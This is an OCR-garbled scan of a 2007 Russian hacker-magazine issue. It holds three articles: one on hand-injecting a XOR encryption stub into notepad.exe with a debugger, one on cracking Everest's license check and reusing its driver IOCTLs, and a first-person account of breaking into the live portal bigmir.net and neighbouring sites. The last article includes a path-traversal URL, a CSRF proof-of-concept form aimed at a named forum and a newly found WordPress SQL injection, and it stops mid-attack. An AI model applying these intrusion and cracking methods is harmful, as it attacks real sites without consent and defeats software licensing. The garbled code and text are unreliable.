ЛЕОНИД «СВ@ѴѴІ_ЕВ» ИСУПОВ 

/СКАѴѴІ_ЕВНАСК@КАМВІ_ЕВ.ВІІ/ 



^ взлом 



Приближение 
к дао 



Шифрование файла формата 
РЕ с использованием отладчика 

Удивительные (но закономерные) события творятся 
в мире ІТ-технологий. Средства разработки 
и защиты программного обеспечения, языки 
программирования высокого уровня за пос- 
леднее время настолько абстрагировались от 
машинного диалекта, что многие уже разу- 
чились работать собственной головой. Всем 
подавай навесные пакеры да протекторы. 

Между тем иметь навыки «ручной» работы 
с машинным кодом очень полезно. 



Бессмертная технология 

Продолжим шифровать=). В предыдущей статьея на примере (программка 
«Неііо, ѴѴогІсІ !», написанная на ассемблере, размером в пару килобайт) 
показал, как вручную написать маленький жучок — криптор — и запихать 
его внутрь РЕ-файла, после чего листинг программы под отладчиком можно 



01006АЕ0 РбЗН 70 

01006АЕ2 РТОЗН ЮТЕ. 01001888 



Это очень хорошо, так как мы должны вставить на место первых инструк- 
ций команду вида «|тр адрес_декодера», а она занимает 5 байт, то есть 



было увидеть л ишь после трассировки декодера. Напомню основную 
концепцию создания этого жучка, которая схожа с механизмом внедрения 
РЕ-вируса в файл. На место первых байт программы вставлялся прыжок 
Утр) на декодер, который располагался в месте, свободном от исполнимых 
инструкций, а именно в секции нулей, созданной компилятором для вырав- 



затираетоба ризб’а, причем еще 2 байта при этом остаются свободными, 
их надо будет поменять на инструкции пор. А хороша эта ситуация тем, что 
данные в стек мы можем положить и после окончания цикла декодирова- 
ния, то есть разместить эти инструкции прямо в теле декодера, непос- 
редственно перед командой перехода наточку входа в программу. Таким 




нивания. Выглядело это примернотак: 



образом, у нас уже есть примерный каркас нашего жучка -декодировщика: 



<^шр адрес_декодировщика> 
Закодированные инструкции> 



Тело_декодировщика : 

1) процесс декодировки по некоторому алгоритму; 

2) переход на точку входа программы; 



Теперья покажутебе, как применить этутехнологию не кобычной про- 
грамме-«дрозофиле», исполнимого кода в которой всего-то на 26 байт 
наберется, а к настоящему приложению — к блокноту из стандартной 
поставки ѴѴІпсІоѵѵз. Мы зашифруем секцию кода простейшим методом, 
который должен бытьтебе хорошо известен, если ты читал предыдущую 
статью. Метод этот — использование операции ХОР 356. Только теперь мы 
усложним себе задачу. Мы не будем пользоваться шестнадцатеричным 
редактором ѴѴІпНех или каким-либо другим подобным инструментом. 

Ведь в предыдущей статье я писал, что мы приближаемся ктому, чтобы 
закодировать РЕ-файл вообще без каких-либо инструментов, вручную, с 
помощью того же поіераб.ехе и развитого мозгового аппарата! Итак, мы 
выкинули из нашего арсенала шестнадцатеричный редактор. Остался 
только отладчик ОІІуОЬд. Первое, что мы сделаем, — исследуем программу. 
Откроем поіераб.ехе под отладчиком. Мы видим, что точка входа в данном 
случае равна 01006АЕ0. Запишем ее на листочек, она нам еще пригодится! 
Далее обрати внимание нато, какие инструкции расположены прямо на 
точке входа в программу: 
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<Процедура декодировки> 

РІІЗН 7 0 
РІІЗН 01001888 

ЙМР 01006АЕ7; переход к точке входа, точнее, на 7 байт 
ниже нее, ведь первые 7 байт мы затерли ;]тр'ом! 

Итак, теперь мы можем заменить первые две инструкции программы 
следующими: 

ЙМР адрес_декодера 

ЮР 

ЮР 



йЖЯ 

Ш: 




лууг шй/'Г , 1 .ли 



Довершаем создание жучка 

Возникает второй вопрос: где поместить наш декодер? Посмотри: начиная 
с адреса 01007071 И идут сплошные нули, все они в нашем распоряжении! 
Ты можешь расположить жучок именно здесь, а я его впихну по адресу 
010070А36 (просто понравился адрес). Теперь надо выяснить, что же мы 
будем шифровать, и начинать писать наш жучок. Стартовый адрес шифро- 
вания — точка входа (01006АЕ06). Теперь прокрути дизассемблированный 
листинг ниже точки входа. Я вижу, что по адресу 01006012И начинаются 
структуры, таблички сишных функций и прочая муть. Мы не будем трогать 
их, чтобы не рисковать работоспособностью программы. Значит, конечным 
адресом шифрования и будет 0 10060126. Посчитаем, сколько всего циклов 
должен будет вы пол нить декодер. Это значение равно разности двух полу- 
ченных адресов: 010060126-01006АЕ06=2326. Значит, мы получили сле- 
дующую инструкцию для нашего жучка — инструкцию установки счетчика 
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циклов (тоѵесх, 232). Разумеется, цикл декодировки будем 
реализовывать с помощью « Іо о р адрес». Теперьу нас есть 
практически вседанныедля написания декодировщика. Вот 
его вид (под отладчиком ОНуйбд по смещению 01 0070АЗИ): 

МОѴ ЕСХ,232; установка счетчика 
РІЛЗН ЕБХ; сохранение регистра есіх 
РІЛЗН ЕСХ; сохранение регистра есх 
МОѴ ЕБХ, [ЕСХ+01006АЕ0 ] ; помещение в есіх деко- 
дируемого значения из памяти 
ХОК ЕБХ,35; декодирование 

МОѴ [ЕСХ+01006АЕ0] , ЕБХ; запись декодирован- 
ного кода на его место 
РОР ЕСХ; восстановление регистра есх 
РОР ЕБХ; восстановление регистра есіх 
ЬООР 01007БА8; операция цикла 
РІІЗН 7 0 

РІЛЗН 01001888; две инструкции секции кода, 
которые мы затерли ;]тр'ом 

ЦМР 01006АЕ7; переход к декодированному коду 

Требуется сосредоточение 

Как видишь, код прост и в комментариях не нуждается. Если 
ты еще не ввел эти инструкции под отладчиком, то сделай 
это и приготовься к выходу в астрал. Готов? Теперь следую- 
щий шаг: вставляй наточке входа операцикципрОКШОАЗ, 
а 2 байта, которые остаются после этой операции, какяуже 
говорил выше, заменяй пор’ами (скорее всего, это произойдет 
автоматически). Следующим логически верным шагом будет 
кодирование секции кода по алгоритму хогЗб (или потому, 
которымты его заменил, а алгоритм тут можетбыть любым!). 

Но как это сделать, если у нас нет шестнадцатеричного редак- 
тора? На самом деле он нам и не нужен! Ведь мы уже встроили 
в файл декодировщик, а при незашифрованной секции кода 
он работает как кодер, то есть в обратном направлении! Зна- 
чит, можно просто запустить программу на исполнение, и она 
сама зашифрует секцию кода. Один тонкий момент: перед тем 
как нажать <5ЫЛ-Е9> для запуска программы на исполнение, 
разреши запись в секцию кода (это делается так: нажимай 
<АИ-т>, указывай нужную нам секцию (она начинается поад- 
ресуОІООІОООЫ правой кнопкой мыши и выбирай «Зеіассезв 
-> ЕиІІАссевв»). После этого запускай процесс (<5ЫЛ-Е9>). 
Теперь наша программа закодировала сама себя! 
Возникаеттолько одна проблема: кодер затер байты перехода, 
который мы вставили в начало секции. Это легко исправить, 
нужно снова поменять эти байты на)тр010070АЗ. Итак, все 
готово! Сохраняй файл под другим именем, это делается сле- 



Результат невыставленных на секцию кода атрибутов ПѴѴЕ 



дующим образом: в меню правой кнопки мыши выбери «Сору 
Іо ехесиіаЫе АН тобіРсабопв». ОНу спросит нас, копиро- 
вать ли данные в файл, на что надо ответить: «Сору а Ц». В от- 
крывшемся окне снова жми на правую кнопку мыши, выбирай 
5аѵе Іііе и сохраняй файл, например, под именем поіеі .ехе. 
Теперьзакрой ОНу и попробуй запустить этот файл. Про- 
грамма не хочет стартовать и выдает ошибку. Это проис- 
ходит потому, что секция кода защищена отзаписи! Чтобы 
убедиться в этом, попробуй загрузить модифицированный 
файл из-под ОИу, предварительно дав атрибуты ПѴѴЕ для 
секции кода (это мы уже делали выше). Программа тут же 
заработает! Значит, надо выставить атрибут ПѴѴЕ намер- 
тво, зафиксировав его в нашей РЕ’шке. Это очень легко 
сделать с помощью, например, ЕогсІ РЕ или Ніеѵѵ, но как 
быть, когда под рукой их нет? В справочнике находим, что в 
РЕ-за головке 4 байта, которые в нашем файле начинаются 
с десятичного смещения 516 от самого его начала, отвечают 
за выставление флагов секции ДехС Я нашел эти байты, 
открыв экзешник прямо в блокноте, и отсчитал 31 байт от 
заголовка секции (строки «Техі», найденной с помощью по- 
иска). Мы должны установить в четвертом, последнем байте 
этой последовательности (по десятичному смещению 51 9 от 
начала файла, втекстовом виде он выглядит какапостроф) 
старший бит в противоположное значение. Как это сделать? 
Из таблицы символов (а можно и при помощи сІеЬид.сот ) 
выясняем, что символу апострофа соответствует код 60Ь. 
Теперь вводим это значение в саіс.ехе 

и переключаемся в режим Ьіп, чтобы увидеть, чему равно 
60 Ь в двоичном виде (01 100000). После этого применяем 
операциюхогспомощьютогоже калькулятора. Хог по 
значению 10000000 даст нам установку старшего бита в 
единичное значение, что и требуется. В результате полу- 
чаемзначение 11100000 вдвоичном или Е0Н в шестнад- 
цатеричном виде. 

Теперь делаем следующее: выясняем десятичное значение 
этого числа (224), удаляем из-под блокнота этот символ- 
апостроф и на его место впечатываем новый символ, набирая 
«224» на цифровой клавиатуре с нажатой кнопкой <АІ1>. Все 
готово! Теперь сохраняем файл и запускаем! Все работает! 



© 

> ѵѵагпіпд 

Внимание! Перед тем как 
правитьлюбой файл, просто 
необходимо его зарезерви- 
ровать. Иначеты рискуешь 
потерять важные данные во 
время эксперимента. 




ѵѵѵѵѵѵ.ѵѵазт.ги — там ты узна- 
ешь, как достичь дао в области 
код инга. 

ѵѵѵѵѵѵ.сгаскІаЬ.ги — здесь тусу- 
ется лучшая часть крякерского 
сообщества. 

ѵѵѵѵѵѵ.хакѳр.ги — тут все понят- 
но ;). Лучший ІТ-журнал своего 
времени. 



Зачем все это? 

Ты спросишь: «Зачем столько мучений, когда можно 
воспользоваться удобными хакерскими инструментами и 
сделатьту же работу вдвое быстрее?» Ответ прост. Это необ- 
ходимо для совершенствования умственных способностей. 
Тренируйся, выдумывай себе головоломки и скоро ты постиг- 
нешь искусство работы с форматом РЕ без инструментов. □С 
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Блестящая защита по-хакерски 

Долгожданное лето, конечно, не может не радовать. Но вместе с наступлением лета подошел 
к концу и учебный год. У одних студентов в полном разгаре сессия, а у других настал тяжелый 
период в жизни под названием «ДИПЛОМ». Вот и моему товарищу также предстояла защита 
диплома. Все бы ничего, но до защиты оставалось всего лишь несколько дней :(. Видя, что он уже 
практически впал в отчаяние и смирился с мыслью о том, что придется защищать диплом в сле- 
дующем году, я решил ему помочь. 



ема его диплома была следующая: «Разработка автома- 
тизированной системы удаленной диагностики компью- 
тера». Если в нескольких словах, то система должна иметь 
клиент-серверную технологию, задачей клиентов которой 
является сбор и отправка значений датчиков (температура процессора, 
скорость вращения кулера ит. д.) на сервер. 

Поиск решения 

Первоначально для получения данных отдатчиков предполагалось 
использовать ѴѴМІ-технологию, но после нескольких часов, проведенных 
за работой, нам так и не удалось достичьжелаемых результатов. Кроме 
того, в интернете была найдена статья, в которой упоминалось о безус- 
пешной попытке получения скорости вращения кулера с использованием 
ѴѴМІ-технологии. Тогда возник вопрос: каким же образом программы 
аналогичной тематики получают интересующие нас значения? Для ис- 
следования была выбрана программа ЕѵегезС 

В папке с программой находится около двух десятков файлов. Сразу и не 
сообразить, где располагается код, отвечающий за получение данных от 
датчиков. Поэтому, чтобы избавиться отлишнего, я стал последовательно 



переименовывать файлы и запускать программу, проверяя, отображаются 
или нет нужные нам данные. В итоге осталось всего лишь четыре файла: 
еѵегезСехе, еѵегезі.Ьіп, кегпеіб.ѵѵпі и еѵегезккеу, назначение которых нам 
предстоит выяснить. 

Судя по размеру файла еѵегезСехе, который составляет всего 65 Кб, 
напрашивается вывод, что он не отвечаетза получение информации о 
системе, а выполняет какие-то другие действия. Для того чтобы выяснить, 
какие именно, откроем его в отладчике ОНуйбд. Но для начала проверим, 
запакован он или нет. РЕЮ показал, что программа запакована ІІРХ’ом, 
поэтому для распаковки выполним команду ирх.ехе -б еѵегезі.ехе. Прежде 
чем приступить к отладке, посмотрим, вызовы каких функций используют- 
ся в программе: для этого откроем окно Еоипб іпіегтобиіагсаііз («ПК -> 
ЗеагсИ Ьг -> АН іпіегтосІиІагсаЦз»). Сразу же привлекает внимание вы- 
зов СгеаіеРгосезз.Жмем на нем <Е2> для установки брейкпоинта, а затем 
и <Е9> для запуска программы. Через несколько мгновений срабатывает 
бряк и выполнение программы прекращается. В качестве имени выпол- 
няемого файла функции передается строка, содержащая еѵегезЕЬІп. 
Предположение оказалось верным — выходит, что основная работа вы- 
полняется в еѵегезЕЬІп. Поэтому делаем следующее: переименовываем 
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еѵегевБЬІп в еѵегев1:_Ьіп.ехе и запускаем на выполнение. 
Послезапуска программа выдала сообщение об окончании срока лицен- 
зии и закрылась. Значит файл еѵегевЕехе отвечал за проверку регист- 
рации программы. Но ничего страшного, это мы поправим. Открываем 
еѵегезі_Ьіп.ехе в отладчике, не забыв сначала его распаковать всетем же 
ІІРХ’ом. Программа загружена, но, прежде чем нажать <Р9>, поставим 
брейкпоинты на вызов МевзадеВох. После запуска сработаетбряк по ад- 
ресу 0x006952496. Посмотрев немного выше, нельзя незаметить команду 
0 В Е еѵеге8і_.0069525А, которая очень походит на проверку на регистра- 
цию. Чтобы развеять все сомнения, меняем ИВЕ на ОМ Р и перезапускаем 
программу. Все работает отлично, идем дальше. 

При отображении скорости вращения кулера выводится заголовок 
Сооііпд Рапв, попробуем его поискать в окне отладчика Тех! зіхіпдв 
геіегепсесі («ПК -> ЗеагсИ Іог-> АН геіегепсеб Іехі зігіпдв»). Такая строка 
действительно есть, и по адресу ОхбАЕССВ осуществляется взятие ее ад- 
реса, ставим бряк. Прервавшись на бряке, начинаем выполнять програм- 
му в пошаговом режимес помощью <Р8>. По адресу ОхбАЕСйС в ЕйХиз 
памяти по адресу 0х02Е9ЕА04 помещается число 0x96В, десятичное 241 1, 
то есть количество оборотов кулера. Теперь попробуем выяснить, где 
оно формируется. Для этого перейдем на начало функции, в которой мы 
находимся в данный момент, и поставим бряк. Для того чтобы определить 
момент записи числа 0x96В в память, перейдем в окне дампа памяти по 
адресу 0х02Е9ЕА04. Итак, выполнение программы прервалось на бряке, 
поставленном в начале функции. В памяти по адресу 0х02Е9ЕА04 нахо- 
дятся нули. Теперь начинаем выполнять программу в режиме анимации, 
без входа в процедуры (<С1х1-Е8>), и одновременно смотрим в окно дампа. 
После строчки «САЕЕеѵегев1:_.005А37Е8» в дампе оказалось число 0x96В. 
Поэтому заходим в эту функцию и ставим в ее начале бряк. При следую- 
щем проходе, прервавшись на нем, снова жмем <СМ-Е8> (забыл сказать: 
<Е12> — пауза). Таким образом, мы дошли до адреса 0x595193, где чуть 
ниже из регистра АХ в памятьзаписывается количество оборотов. При этом 
значения [ЕОСАЕ.7] и [ЕОСАЕ.8] равны 0. Теперь нам нужно найти место, где 
производится запись в [ЕОСАЕ.9]. 

/*595193*/МОѴ ЕАХ , [БОСАБ.7] 

/*595196*/АББ ЕАХ, [ЬОСАЬ.8] 

/*595199* /АББ ЕАХ, [БОСАЬ.9] 



/*59519С* /МОѴ БШЕБ РТЕ БЕ: [ЕВХ+998] , ЕАХ 

Такое место находится чуть выше, по адресу 0x595020. 

/ *594ЕЕВ* / МОѴ АБ , 2 А 
/ *594ЕЕВ* / САШ еѵегезБ_. 0058801С 
/ *594ЕЕ2 * /МОѴ Е8І,ЕАХ 
. / * 5 95 0 ОС* / ІМЦБ Е8І , [ЬОСАБ. 11] 

/*595010* /МОѴ [БОСАЬ. 81] ,ЕЗІ 
/*595016* /ЕІЬБ [ЬОСАБ. 81] 

/*59501С* /ЕББ БШЕБ РТЕ БЗ : [59Е5АС] 

/*595022*/ САББ еѵегезБ_. 004032ЕС 
/ *595027* /САББ еѵегезБ_. 00402С5С 
/*59502С*/ МОѴ [БОСАБ. 9] , ЕАХ 

Здесь происходит следующее: с помощью команд сопроцессора значе- 
ние, находящееся по адресу 0х59Е5АС (=1350000), делится на произведе- 
ние Е5І (=0x46) и [ЮСАЕ.1 1] (=8). Деление выполняется в вызове«САЕЕ 
еѵегев1;_.004032ЕС». В результате анализа кода было выяснено, что зна- 
чения [ЮСАЕ.1 1] и [0x59 Е5АС] постоянны. В Е5І же записывается резуль- 
тат вызова подпрограммы, находящейся по адресу 0x0058801 С. Внутри 
этой подпрограммы находятся два САЮ'а (0x588047 и 0x588056), внутри 
которых происходит вызов ОеѵісеІоСопігоЕ Выходит, что программа для 
получения сведений отдатчиков используетобращение кдрайверу. 

Про работу с драйверами можешь почитать в литературе. Скажулишь, что 
для общения программ прикладного уровня сдрайверами используются 
запросы, посылаемые с помощью ВеѵісеІОСопІтоЕ 

ВООБ БеѵісеІоСопБгоІ 
( 

НАБББЕ ББеѵісе, // дескриптор устройства 

БШЕБ сѣѵІоСопБгоІСосІе , / / код операции 

БРѴОІБ ІрІпВиІІег, / / буфер входных данных 

БШЕБ пІпВиІІегЗіге , // его размер 

БРѴОІБ ІрОиСВиІІег, // буфер данных результата 

БШЕБ пОиБВиІІегЗізе , // его размер 

БРБШЕБ ІрВуБезЕеБигпеб, //адрес данных для вывода 



Сообщение об окончании срока действия лицензии 
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Рабочий пример 
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Вывод количества оборотов кулера 




ЬРОѴЕКЬАРРЕБ ІрОѵегІарресІ) ; //адрес перекрывающей 
структуры 

Ну и что теперь делать, если с ѴѴМІ ничего не вышло? Не писать же свой 
драйвер, когда сроки поджимают... А что если взять уже готовый. Это, 
конечно же, плагиат, но диплом-то важнее :)! Наша задача сводится к 
следующему: 

О узнать, какой драйвер используется; 

2) узнать, какие данные передаются драйверу с помощью ВеѵісеІоСопІхоІ; 

3) написать свое собственное приложение. 

Итак, так как первый параметр функции ОеѵісеІоСопігоІ — это дескрип- 
тор устройства, который возвращает функция СгеаіеРІІе, то ставим 
брейкпоинт на все вызовы СгеаІеРІІе и перезапускаем программу. 
Сработал брейкпоинт, в качестве первого параметра Рі Іе N а те 
функции передается строчка «СДРгодгат Рі 1ез\ ЕѴЕ Р ЕБТ ІІШтаІе 
ЕбіІіопѴеѵегевЕкеу». Нас это мало интересует, поэтому жмем <Р9> еще 
несколько раз, пропуская не интересующие нас вызовы, пока неуви- 
дим в стеке строку «\\.\ЕѵегеБЮ гіѵе г». Запомним значение, возвраща- 
емое функцией, поскольку ононамеще пригодится (уменяоноравно 
0x98). Может возникнуть вопрос: откуда же взялся этот драйвер? Если 
посмотреть в каталог с программой, то можно увидеть, что у нас остался 
еще один файл, назначение которого пока еще неизвестно, — кегпеіб. 
ѵѵпЕ Именноони является драйвером. В этом можно убедиться по 
вызовам функций ІоСгеаіеОеѵісе и ІоСгеаіеЭутЬоІісЫпк, находящихся 
в нем и создающих виртуальное устройство и символическую ссылку 
на него. Первый пункт нашего плана выполнен, переходим ко второму. 
Установим брейкпоинты на адреса 0x588047 и 0x588056, по которым 
производится вызов ОеѵісеІоСопІгоІ. Прервавшись, внимательно пе- 
реписываем значения передаваемых функциям параметров. В первом 
случае параметры следующие: 

ЫЭеѵісе = 0x98 

сМоСопСгоІСосІе = 0х8010205С 

ІрІпВиТТег = 0 х042ВЕ6Е0 //{0x95,0x02,0,0,0x2а, 

0, 0, 0, 0, 0, 0,0} 
пІпВиТТегЗізе = ОхС 
ІрОиСВиТТег = 0 х 042ВЕ6Е0 
пОиСВиТТегЗізе = ОхС 
ІрВуСезКеСигпесі = 0х042ВЕбБС 
ІрОѵегІарресІ = ШЬЬ 

ЬОеѵісе равно значению, которое было получено от функции СгеаіеЕІІе 
при открытии «\\.\Еѵеге5Шгіѵег». Следовательно, мы не ошиблись. Пара- 
метры функции при втором вызове следующие: 

йБеѵісе = 0x98 

сІмІоСопСгоІСосіе = 0x80102058 

ІрІпВиТТег = 0х042ВЕбБС / / { 0x96 , 0x02 , 0 , 0 , 0 , 0 , 0 

,0,0, 0, 0,0} 
пІпВиТТегЗізе = ОхС 
ІрОиСВиТТег = 0х042ВЕбБС 
пОиСВиТТегЗізе = ОхС 



ІрВуСезКеСигпесі = 0х042ВЕбБ8 
ІрОѵегІарресІ = ШЬЬ 

После второго вызова содержимое выходного буфера следующее: 
{0x96,0x02,0,0,0x46,0,0,0,0,0,0,0}. Пятый по счету параметр — это будущее 
значение Е5І при вычислении количества оборотов. Теперь можно пере- 
ходить и ктретьему пункту плана. 

Реализация 

В качестве среды программирования я выбрал ѴІ5иаІС++6.0, и уже через 
несколько минуту меня было рабочее приложение. После этого я аналогично 
реализовал получениетемпературы процессора и еще кое-какихданных, а 
домашнимзаданиемтоварища стала реализация загрузки драйвера с помо- 
щью 5СМ-функций и обеспечение передачи данных от клиентов ксерверу. 

ШЩБЬЕ ЬЕі1е=0; 

БШІФ геСигпВуСе=0 ; 

Іопд скшЫе зреесі; 

сйаг ВиТІ [12 ] = { 0x95 , 0x02 ,0,0, 0х2А, 0, 0,0, 0,0, 0,0}; 
сАаг ВиТ2 [ 12 ] = { 0x9 6 , 0x02 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 } ; 
ЗЕКУ1СЕ_ЗТАТ113 зегѵЗСаС ; 

АЕі1е=СгеаСеЕі1е ( " \ \ \ \ . \ \ЕѵегезСБгіѵег " , СЕЕЕКІС_ 
КЕАБ|СЕЫЕКІС_ШІТЕ, 0 , ШЬЬ , ОРЕЫ_ЕХІЗТШС , 0,ШЬЬ) ; 
іі ( ( іпС ) 1тЕі1е= = -1 ) 

{ 

: :МеззадеВох ( 0 , "Драйвер не загружен" , " ЕК" , МВ_ОК) ; 

геСигп; 

} 

БеѵісеІоСопСгоІ (1тЕі1е,0х8010205С,Ви11,12, 

Вибі Д2 ,&геЕигпВуЕе,ШЕЕ} ; 

БеѵісеІоСопСгоІ ( АЕіІе , 0x80102058, Ви 12, 12, 

Ви12 , 12 , &геСигпВуСе , ШЬЬ) ; 
зреесі=13 50000 / (Ви12 [4] *8) ; 

Нарру ЕпсІ 

В итоге на следующий деньтоварищзащитился на отлично и стал дип- 
ломированным специалистом, а я получил в качестве вознаграждения 
энное количество пива :]. ЗЕ 



Интересующие нас параметры, отображаемые в окне программы Еѵегезі 
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Правильный подход к локализованному партнеру ісд.сот 

Здравствуй, мой юный друг! Сегодня на нашем операционном столе лежит и подрагивает 
всеми конечностями очень известный пациент — украинский портал Ьі§тіг.пеі (аналог 
нашего Рамблера на Украине) . Ты спросишь, что же в нем такого особенного? Отвечу. 
Бигмир — локализованный партнер кщ.сот, через который проходит привязка номерков 
аськи к мылу, регистрация новых уинов и другие вкусности, связанные с аськой. Стало 
интереснее? Тогда читай дальше :). 



Нет ничего невозможного! 

Помнишь майский номер ][, гдетвой покорный слуга успешно поимел 
израильский 1С0 ѴѴАР-шлюз д’аі.сот ? Это было лишь начало :). Сразу 
после продажи красивых номерков с этого сервиса я принялся изучать 
локализованных партнеров ісд.сот в различных странах: папа.со.іі . 
гатЫег.ги . тѵпеі.сот . аЬѵ.Ьд . гогпат.зк . пеіѵідаіог.сот . ргозіеЬеп.сІе . 
аііаз.сг и Ьідтіг.пеі: . Для этого я скачал крякнутый сканеруязвимостей 
ХЗрісІег 7.5 (ссылку приводить не буду, поскольку это незаконно, ноты 
можешь поискать ее сам на различных форумах, посвященныххаку) иза- 
пустил его на своем компе суказанными выше доменами для их проверки. 
Спустя час прога выдала мне первые результаты :). Жертва была найдена 
— украинский портал Ьідтіг.пеі: с РР=8 по Гуглу (в России сайтов стаким 
пиаром всеготри). 

Сама ядовитая ссылка выглядела так: 

ЫсДр : / /упапу . Ьідтіг . пеД/ 

?и= / еОс/ 
раззѵ\к!%0 0 

Очень похоже на локальный инклуд с пиИ-байтом. Но, как позже выясни- 
лось, это было далеко не так. Этот баг позволял лишь просматривать файлы 



в системе, а до выполнения рЬр-кода дело не дошло. Код в исходнике 
главной страницы Бигмира выглядиттак: 

$и = @$_СЕТ [ 'и ’ ] ; 

©геасІРіІе ( $зОаРісВіг . ' гаРіпд 1 . $0 . $и. ' .Ысші ' ) ; 

Просмотрев некоторые системные файлы (например, ѵѵѵѵѵѵ.Ьідтіг. 
пеі/?и=../../../../../../../../../../и5г/ІосаІ/еіс/арасЬе22/ех(га/ЬирсІ-ѵЬо5і5. 
сопі%00], я решил пока отложить эту уязвимость и идти дальше. 

Хорошие соседи 

Как видишь, даже втаком серьезном портале уже на главной странице 
обнаружился очень серьезный баг. Но с него ничего хорошего поднять 
было нельзя. Поэтому следующим моим шагом стало изучение сайтов, 
расположенных натом же сервере, что и Ьідтіг.пеі. Я зашел на всем из- 
вестный сервис I Р-1ооки р ЫНр://сІотаіп5СІЬ.пе1: . вбил туда наш любимый 
Бигмир и стал смотреть результаты. 

На самом ІР-адресе Бигмира других сайтов не было, а вот на его же 
N5 я увидел парѵсайтиков: ЫірѴ/коггезропсІепі.пеі и ЫірУ/гісагсІо. 
сот.иа . ссылки на которые были на главной странице нашего портала. 



Відтіг.пеі? 



не бупет! 



► 074 



ХАКЕР 08 /104/ 07 






взлом 



» 




Немного поизучав новых пациентов, я наткнулся на их форумы [ ЫНр:// 
[огит.коггевропсІепЕпеІ: и ЫірУ/гісагсІо.сот.иаЛогит ). Наметанный 
глаз сразу узнал скрипты борды. И там, и там стоял РЬогит. Но, чтобы 
начать какие-либо хакерские действия, необходимо былоузнать версию 
форума. Пройдя по ссылке Шр:/Логит.когге5ропбеп{.пеі/асІппіп.рІір . я 
обнаружил надпись: «Ѵегзіоп 5.1 .16а». Для нее, конечно, были известные 
баги, но паблик-сплоитов под них не существует, а ковыряться с ЫіпсІ 
ЗОЫщесбоп не позволяла лень. Смотри сам, небольшой РоС-сплоит 
(работающий, конечно, после логина на форум и подстановки существую- 
щих ісі форума итемы): 

<ЬРт1> 

<Ьо<іухРогш те0Ъ.ос1=Р08Т асРіоп= "іШРр : //Рогшп. 
коггезропсіепр . пек /рт . ркр " > 

<іприк Руре= "кіскіеп" пате= " гесіріепкз [123 '] " 
ѵа1ие= " кезкегз " > 

<іприк куре= "МсМеп" пате= " аскіоп" ѵа1ие="розк" /> 
<іприк куре= " Рехк П ісЗ= " зиЬз еск " пате= " зиЪэ еск " 
зІ2е="50" ѵа1ие=" " /> 

<кехкагеа іс!= "теззаде" пате= "теззаде» гомз="2 0" 
со1з= " 50 " ></кехРагеа> 

<іприк куре» "МсИеп" пате= " іогит_іс1" ѵа1ие="1" /> 
<іприк куре» " зиЪтік" пате= " кезк " ѵа1ие= " кезк " > 

<іприк пате» "ргеѵіеѵ?" ѵа1ие= " Ргеѵіеѵг " /> 
</Ъос1у></Ъкт1> 

Далеея совершил те же самые действия и со вторым форумом, но 
админки по этому адресу не было. В итоге, ковыряясь с этими форумами, 
я нашел только одну интересную особенность: если пройти по ссылке 
ЬирУ/гісагбо.сот.цаЛогит/босз . то в окне браузера можно наблюдать 
следующую забавную картину: 

Шагпіпд: шаіп ( . /сіосз ) [ кипскіоп.таіп] : каііесі До ореп 
зкгеат: Іпѵаіісі агдитепк іп /зкогаде/меЪ/Ъ.кс1осз/ 
гісагсіо/радез/когит. крі оп Ііпе 47 

Еакаі еггог: таіп ( ) [ кипскіоп . гедиіге] : Еаііесі орепіпд 
гедиігесі ' . /сіосз' ( Іпс1ис1е_рак]т= • . : /изг/іосаі/зігаге/ 
реаг') іп /зкогаде/меЪ/кксІосз/гісагсІо/радез/когит. крі 
оп Ііпе 47 

Но опятьже это все была ерунда, нужен был более серьезный баг. 

Истина где-то рядом 

Выбрав в качестве своей основной жертвы ЫірУ/коггезропсІепкпек я 
продолжил хождение по этому ресурсу и через несколько минут наткнулся 



на ШрУ/Ыод.коггевропсІепкпек на главной странице которого в самом 
низу было написано: «Блог Коггезропсіепі.пеі работает на ѴѴогбРгезз». 
Увидев эту надпись, я обрадовался, поскольку ѴѴогбРгезз — крайне 
дырявый движок, следовалотолько узнать его версию, для чего я прошел 
по ссылке ЬНрУ/Ыод.коггезропсІепкпеІ/геасІте.НітІ . На открывшейся 
паге гордо красовалась вторая обрадовавшая меня за последние несколько 
минут надпись: «ѴѴогбРгезз 1 .5» :]. Я ринулся на ЬНрУ/тіІѵѵОгт.сот . вбил 
там в поиск название движка иувидел кучу очень неплохих сплоитов, 
из которых выбрал ѴѴогсІргезз <= 1 .5.1.3 Нетоіе Собе Ехесиііоп еХрІоіІ 
(теІазрІоіі),так как он был последним для ветки 1.5, запустил его и... 
ничего не получил :(. Огорчению моему не было предела. Значит, на 
исследуемом сайте стоял ѴѴогбРгезз 1 .5.2, для которого не было паблик- 
сплоитов. Эта неудача вынудила меня забить на несколько дней на взлом 
Бигмира. 

ѴѴогсІРгезз под ударом 

Естественно, этим история не заканчивается :]. Погуляв пару дней на 
свежем воздухе, я подумал, а почемубы самому не поискать баги вдвижке 
блога, чем немедленно и занялся. Зашел на официальный сайт движка 
ЬирУ/ѵѵогбргезз.огд . далее — в архив раздела Боѵѵпіоаб и скачал оттуда 
последнюю версию из первой ветки — 1 .5.2. Установил блог на локалхосте 
и принялся за раскопки :). На поискбага ушло несколько часов и пара 
литров пива, я копал каждый файл, мучал параметры, листал исходники... 
И в итоге мои старания были вознаграждены! Банальная скул-инъекция 
присутствовала в файле ./ѵѵр-абтіп/изег-ебікрЬр в 69-й строке: 

$гези1к = $щрс1Ъ->диегу ( "ІІРБАТЕ $ѵдэсІЪ->изегз ЗЕТ изег_ 
Іодіп = ' $пем_изег_1одіп 1 , изег_кігзкпате = ' $пем_ 
кігзкпате ' , $ирс!акераззѵ\гогс1 изег_1азкпате= 1 $пем_ 
Іазкпате ' , изег_піскпаше= 1 $пеѵ7_піскпаше ' , 
изег_ісд= ' $пеѵ\г_ісд' , изег_ешаі1= 1 $пеѵ^_ешаі1 ' , изег_ 
иг1= ' $пеш_иг1 ' , изег_аіш = ' $пеѵ\г_аіт' , изег_тзп= 1 $пем_ 
тзп' , изег_уіт= ' $пеш_уіт' , изег_іс!то(іе= ' $пем_ісітосІе ' , 
изег_с1езсгіркіоп = ' $пем_сІезсгіркіоп ' , изег_пісепате = 

1 $пем_пісепате 1 ШНЕКЕ ІБ = $изег_ісІ" ) ; 

Итак (трубят фан фары).. .У нас на операционном столе — новый 
приватный баг ѴѴогбРгезз, найденный твоим покорным слугой :). 

Для его использования необходима регистрация на уязвимом блоге. 
Вообще он находится в файле ѵѵр-гедівіег.рбр, но на Коггезропбепкпеі 
была сделана общая регистрация для всех сервисов сайта, поэтому, 
зарегавшись и залогинившись на сайте, я прошел по ссылке Ыір:// 
